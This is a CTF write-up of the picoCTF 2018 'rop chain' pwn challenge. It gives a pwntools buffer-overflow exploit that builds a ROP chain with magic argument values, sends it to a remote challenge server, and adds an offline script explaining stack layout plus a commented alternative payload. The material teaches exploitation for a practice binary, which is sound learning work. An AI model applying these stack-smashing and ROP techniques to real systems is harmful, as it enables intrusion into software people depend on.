picoctf_2018_rop chain (argument passing)

  1. A write-up of a pwn challenge that requires passing arguments through a ROP chain.

  2. It is fairly simple, so the exploit is given directly, with a little more detail.

    win_function2 is win_function1's return address; p32(win_function2) takes an argument; flag + 0xBAAAAAAD are win_function2's return address and argument respectively; 0xBAAAAAAD + 0xDEADBAAD are flag's return address and argument respectively.

    from pwn import *
    from LibcSearcher import *
    #r = process('./PicoCTF_2018_rop_chain')
    r = remote("node5.buuoj.cn", 29125)
    # 0x18 bytes of buffer plus 4 bytes of saved ebp before the return address
    offset = 0x18 + 0x04
    win_function1 = 0x80485CB
    win_function2 = 0x80485D8
    flag = 0x804862B
    # win_function1 returns into win_function2; flag is then win_function2's return
    # address and 0xBAAAAAAD its argument; 0xBAAAAAAD doubles as flag's return
    # address and 0xDEADBAAD is flag's argument
    payload = offset * b'a' + p32(win_function1) + p32(win_function2) + p32(flag) + p32(0xBAAAAAAD) + p32(0xDEADBAAD)
    r.sendline(payload)
    r.interactive()
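To see why one 4-byte word can serve as both win_function2's argument and flag's return address, the following added script (not part of the original write-up) models the x86 stack from each callee's point of view; it reuses the addresses above and uses struct instead of pwntools so it runs offline.

```python
import struct

# Addresses and magic values copied from the exploit above.
WIN_FUNCTION1 = 0x80485CB
WIN_FUNCTION2 = 0x80485D8
FLAG = 0x804862B
OFFSET = 0x18 + 0x04

def p32(value):
    """Little-endian 32-bit pack, equivalent to pwntools' p32 on x86."""
    return struct.pack("<I", value & 0xFFFFFFFF)

def build_payload(offset, words):
    """Padding up to the saved return address, followed by the chain words."""
    return b"a" * offset + b"".join(p32(w) for w in words)

def callee_views(words, n_calls):
    """Simulate the chain from each callee's point of view.

    When the overwritten return address at words[i] is popped, esp points at
    words[i+1]: under cdecl that slot is the callee's own return address and
    words[i+2] is its first argument. Each 'ret' advances esp by one slot, so
    function N's argument becomes function N+1's return address, which is why
    0xBAAAAAAD is read once as an argument and once as a return address.
    Returns a list of (function, return_address, first_argument) tuples.
    """
    views = []
    for i in range(n_calls):
        func = words[i]
        ret_addr = words[i + 1] if i + 1 < len(words) else None
        arg1 = words[i + 2] if i + 2 < len(words) else None
        views.append((func, ret_addr, arg1))
    return views

# The exact chain used in the exploit above.
CHAIN = [WIN_FUNCTION1, WIN_FUNCTION2, FLAG, 0xBAAAAAAD, 0xDEADBAAD]

if __name__ == "__main__":
    payload = build_payload(OFFSET, CHAIN)
    print(f"payload length: {len(payload)} bytes")
    for func, ret_addr, arg1 in callee_views(CHAIN, 3):
        print(f"call {func:#x}: returns to {ret_addr:#x}, arg1 = {arg1:#x}")
```

The three printed lines reproduce the sentence in the write-up: flag is win_function2's return address, 0xBAAAAAAD is both win_function2's argument and flag's return address, and 0xDEADBAAD is flag's argument.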

  3. Another approach is to set the return address to ebp.

    #ebp=0x0804859b
    #payload=b'a'*(0x2c+4)+p32(0x8048586)+p32(0x804859D)+p32(ebp)+p32(0xACACACAC)+p32(0x8048606)+p32(ebp)+p32(0xBDBDBDBD)